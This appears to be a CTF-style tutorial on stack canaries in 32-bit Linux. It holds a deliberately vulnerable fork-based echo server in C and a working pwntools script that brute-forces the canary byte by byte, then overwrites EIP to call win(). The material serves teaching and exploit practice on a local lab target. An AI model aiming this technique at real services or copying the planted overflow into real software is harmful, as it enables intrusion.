And now for something more CTF-y: Dealing with stack canaries by brute-forcing their value byte by byte.
How Stack Canaries Work
If you’ve ever read the error message *** stack smashing detected ***: <...> terminated, you’ve already encountered stack canaries in action. They are used to detect and stop buffer overflows by placing a per-process randomized value between the local variables and the saved return address. If an attacker manages to write past the end of a buffer in order to overwrite the saved return address, they will also overwrite the canary. Before returning from a function, the program checks whether the canary is still intact and aborts if it has been altered. The overwritten return address is therefore never loaded into the instruction pointer, because the application terminates first. The following animation shows a successful canary check and a failed one. Keep an eye on the EAX register, which holds the result of the canary check. If it’s all zeroes, the check has succeeded. In every other case the application will not skip the call sym.__stack_chk_fail_local instruction after the check, which causes the application to terminate:
The check is performed as follows:
- mov eax, dword [var_1ch]: Load the stack canary of the current function into EAX.
- xor eax, dword gs:[0x14]: XOR the value in EAX with the reference copy of the canary, which is addressed through the GS segment register at offset 0x14. On 32-bit Linux, user-space code uses GS to reach thread-local storage, and that is where the reference canary lives. You can read more about this in the comments of the kernel source code.
- je 0x8049333: The previous XOR operation has set the zero flag to 1 if its result was 0. This jump causes the program flow to skip the next call and continue execution normally.
- In case of a failed check: call sym.__stack_chk_fail_local causes the application to terminate.
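The check boils down to an XOR followed by a test for zero. A minimal Python model of that logic might look like the following; the helper name canary_intact and the canary value are made up for illustration and do not come from the real binary:

```python
def canary_intact(stack_copy, reference):
    """Model of the epilogue check: XOR both 32-bit values, pass if the result is zero."""
    result = (stack_copy ^ reference) & 0xFFFFFFFF  # what ends up in EAX
    return result == 0  # zero flag set: je is taken and __stack_chk_fail is skipped


reference = 0x5DE3A100  # made-up value standing in for the copy at gs:[0x14]

print(canary_intact(0x5DE3A100, reference))  # stack copy untouched
print(canary_intact(0x41414141, reference))  # stack copy overwritten with "AAAA"
```

Any difference between the two values, even in a single bit, leaves a non-zero result in EAX and sends execution into the failure handler.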
The size of a stack canary depends on the running application. It’s always the native word size, so it will be 32 bits for 32-bit processes and 64 bits for 64-bit processes.
Stack Canaries On Linux
On Linux, the least significant byte (LSB) of the canary is always 0x00. The idea here is that attackers may not be able to write a zero byte in a buffer overflow attack, since many functions that operate on strings terminate on such a value. An example of this is strcpy(). Other functions such as recv(), however, allow writing zero bytes, so exploitability can depend on the function call that’s in use. The following animation demonstrates this: overwriting the LSB, which is the first canary byte we reach when overflowing, with 0x00 after a recv() does not crash the remote process, since this byte is always expected to be zero.
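To make the byte order and the effect of the zero byte concrete, here is a small Python 3 sketch. The canary value is made up, and strcpy_like and recv_like are hypothetical helpers that only model how many payload bytes each kind of function would copy:

```python
import struct

canary = 0x5DE3A100  # made-up example value; its least significant byte is 0x00

# x86 is little-endian, so the least significant byte sits at the lowest address
in_memory = struct.pack("<I", canary)
print(in_memory[0] == 0)  # the first canary byte an overflow reaches is the zero byte


def strcpy_like(payload):
    """String functions stop copying payload bytes at the first zero byte."""
    return payload.split(b"\x00", 1)[0]


def recv_like(payload):
    """recv() copies raw bytes and does not care about zero bytes."""
    return payload


payload = b"A" * 64 + in_memory
print(len(strcpy_like(payload)))  # stops right before the canary's zero byte
print(len(recv_like(payload)))    # all payload bytes, canary included
```

With a string function, the payload bytes after the zero byte never make it into memory, which is exactly what the zero LSB is meant to achieve.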
A second aspect to keep in mind is that fork() effectively creates a copy of the parent process. So when a process spawns child processes using this system call, all of them share the same stack canary value. This is unlike exec*() operations, where the current process gets replaced by an entirely new one. Because the canary stays the same across forked children, the brute-force approach becomes possible.
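The copy semantics of fork() can be observed with a few lines of Python 3 on a Unix-like system. This is only an illustration: the variable secret stands in for the canary (it is not the real one), and value_seen_by_child is a hypothetical helper:

```python
import os

secret = os.urandom(4)  # stands in for the per-process canary


def value_seen_by_child():
    """Fork a child and return the bytes it reports for `secret`."""
    read_end, write_end = os.pipe()
    pid = os.fork()
    if pid == 0:
        # Child: runs on a copy of the parent's memory
        os.close(read_end)
        os.write(write_end, secret)
        os._exit(0)
    # Parent: read what the child saw, then reap it
    os.close(write_end)
    data = os.read(read_end, 4)
    os.close(read_end)
    os.waitpid(pid, 0)
    return data


# Every forked child reports the same value the parent holds
print(all(value_seen_by_child() == secret for _ in range(3)))
```

A crashed child therefore costs the attacker nothing: the next connection is served by a fresh child with the very same value.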
The Target
Consider the following echo server that uses fork() to spawn a child process for every connection (return values are not checked, to keep the listing short):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 2223

void pwned(int socket)
{
    char data[64];
    bzero(data, sizeof(data));
    // overflow happens here: up to 1024 bytes are read into a 64-byte buffer
    recv(socket, data, 1024, 0);
    if (strlen(data))
    {
        printf("[*] Received: %s\n", data);
        send(socket, data, strlen(data), 0);
    }
}

void win()
{
    printf("EIP Overwrite Worked :)\n");
}

int main()
{
    int sockfd, ret;
    struct sockaddr_in serverAddr;
    int newSocket;
    struct sockaddr_in newAddr;
    socklen_t addr_size;
    char buffer[1024];
    pid_t childpid;

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    memset(&serverAddr, '\0', sizeof(serverAddr));
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_port = htons(PORT);
    serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    ret = bind(sockfd, (struct sockaddr *)&serverAddr, sizeof(serverAddr));
    if (listen(sockfd, 10) == 0)
    {
        printf("[+] Listening....\n");
    }
    else {
        printf("[-] Error Binding to Port\n");
    }
    while (1)
    {
        // accept() expects the size of the address buffer on input
        addr_size = sizeof(newAddr);
        newSocket = accept(sockfd, (struct sockaddr *)&newAddr, &addr_size);
        printf("[*] Got Connection from %s:%d\n", inet_ntoa(newAddr.sin_addr), ntohs(newAddr.sin_port));
        if ((childpid = fork()) == 0)
        {
            close(sockfd);
            pwned(newSocket);
            // if this works then no buffer overflow has occurred
            send(newSocket, "OK\n", strlen("OK\n"), 0);
            close(newSocket);
            // the child is done; without this it would fall back into the accept() loop
            exit(0);
        }
        else
        {
            close(newSocket);
        }
    }
    return 0;
}
This has to be compiled with gcc -m32 server.c -o server -no-pie for the sake of this tutorial. If your distribution’s gcc does not enable stack protection by default, add -fstack-protector as well. The -no-pie flag disables PIE (yes really) and causes the function win(), which we want to call, to be at a predictable address: 0x0804933b in my case. This was determined using radare2 with aaa;afl~win.
Brute-Forcing the Canary Value
This is the plan:
Starting from the LSB, which is already known, the brute-force script will try all possible values for each of the remaining three bytes. If the remote process doesn’t crash, the current byte has been guessed correctly and the script can move on to the next one.
Using pwntools, we are able to set up the brute-forcing quickly. It’s also possible to detect remote crashes by checking whether the response contains OK. The server sends this after the vulnerable function has returned, so it can only arrive if no crash occurred.
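Before pointing anything at a live server, the byte-by-byte idea can be checked offline. The following Python 3 sketch replaces the network round trip with a hypothetical oracle function, survives(), that answers the same question the OK response answers: do all overwritten canary bytes match? SECRET is a simulated canary, not a real one:

```python
import os

SECRET = b"\x00" + os.urandom(3)  # simulated canary with the usual zero LSB


def survives(guess_prefix):
    """Hypothetical oracle: True if every overwritten canary byte matches."""
    return SECRET.startswith(guess_prefix)


def brute_force(oracle, known=b"\x00", size=4):
    """Recover the canary one byte at a time, counting the attempts needed."""
    found = bytearray(known)
    attempts = 0
    while len(found) < size:
        for guess in range(256):
            attempts += 1
            if oracle(bytes(found) + bytes([guess])):
                found.append(guess)  # no crash: this byte is correct
                break
        else:
            raise RuntimeError("no byte value survived")
    return bytes(found), attempts


canary, attempts = brute_force(survives)
print(canary == SECRET, attempts <= 3 * 256)
```

Guessing each byte separately needs at most 3 * 256 = 768 connections, whereas guessing the three unknown bytes at once could take up to 256^3 = 16,777,216.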
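#!/usr/bin/env python2
from pwn import *
import struct

PADDING = 64     # size of the data[] buffer in pwned()
canary = [0x00]  # the least significant byte is always zero

# Guess the remaining three canary bytes one at a time
for cb in range(3):
    for currentByte in range(256):  # every possible byte value, 0x00 through 0xff
        print("[+] Trying %s (Byte #%d)..." % (hex(currentByte), cb + 2))
        r = remote("localhost", 2223)
        # Padding, then the canary bytes found so far, then the current guess
        DATA = b"A" * PADDING
        DATA += b"".join([struct.pack("B", c) for c in canary])
        DATA += struct.pack("B", currentByte)
        r.clean()
        r.send(DATA)
        received = b""
        try:
            received = r.recvuntil(b"OK")
        except EOFError:
            print("Process Died")
        finally:
            r.close()
        # "OK" only arrives if pwned() returned, i.e. the canary check passed
        if b"OK" in received:
            canary.append(currentByte)
            print("\n[*] Byte #%d is %s\n" % (cb + 2, hex(currentByte)))
            break
    else:
        # None of the 256 values survived, so something else is wrong
        raise SystemExit("[-] No value worked for byte #%d" % (cb + 2))

print("Found Canary:")
print(" ".join([hex(c) for c in canary]))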
Using some radare2 magic, it’s possible to attach to the child process that will be targeted for an exploit and see how it behaves after successfully brute-forcing the correct canary value using the script above:
These radare2 commands have been used:
- e dbg.forks = true: This causes radare2 to break in case the currently debugged process spawned a child process with fork()
- dp lists the current PID and all children
- dp=<PID> selects the new process to debug, in this case the new child process
- db sym.pwned sets a breakpoint in the vulnerable function
As can be seen in the animation above, the canary check was passed and the EIP register has been successfully overwritten with 0x41414141. The only thing left to do now is to overwrite the instruction pointer with the address of the win() function. Let’s use pwntools again:
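# Continues the brute-force script above, which provides `canary` and the imports
PADDING = 64
EIP = p32(0x0804933b)  # address of win(), packed as 4 little-endian bytes
r = remote("localhost", 2223)
DATA = b"A" * PADDING
DATA += b"".join([struct.pack("B", c) for c in canary])
DATA += b"B" * 28 # Additional padding
DATA += EIP
r.send(DATA)  # the server should now print the message from win()
r.close()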
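The layout of the final payload can also be checked without pwntools. In this Python 3 sketch, build_payload is a hypothetical helper and the canary bytes are made up. The gap of 28 bytes is consistent with the disassembly shown earlier, assuming var_1ch means the canary sits at ebp-0x1c: after its 4 bytes, 24 bytes remain up to the saved EBP, plus 4 bytes for the saved EBP itself.

```python
import struct


def build_payload(canary_bytes, return_address, padding=64, gap=28):
    """Assemble: buffer filler, intact canary, filler up to the return address, new EIP."""
    payload = b"A" * padding
    payload += bytes(canary_bytes)                # must match, or the check fails
    payload += b"B" * gap                         # covers the bytes up to and including saved EBP
    payload += struct.pack("<I", return_address)  # same bytes p32() produces by default
    return payload


example = build_payload([0x00, 0xA1, 0xE3, 0x5D], 0x0804933B)
print(len(example))        # 64 + 4 + 28 + 4 = 100
print(example[-4:].hex())  # 3b930408
```

The last four bytes are the address of win() in little-endian order, which is what ends up in EIP when pwned() returns.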
Done :)
Peace out and happy CTF-ing.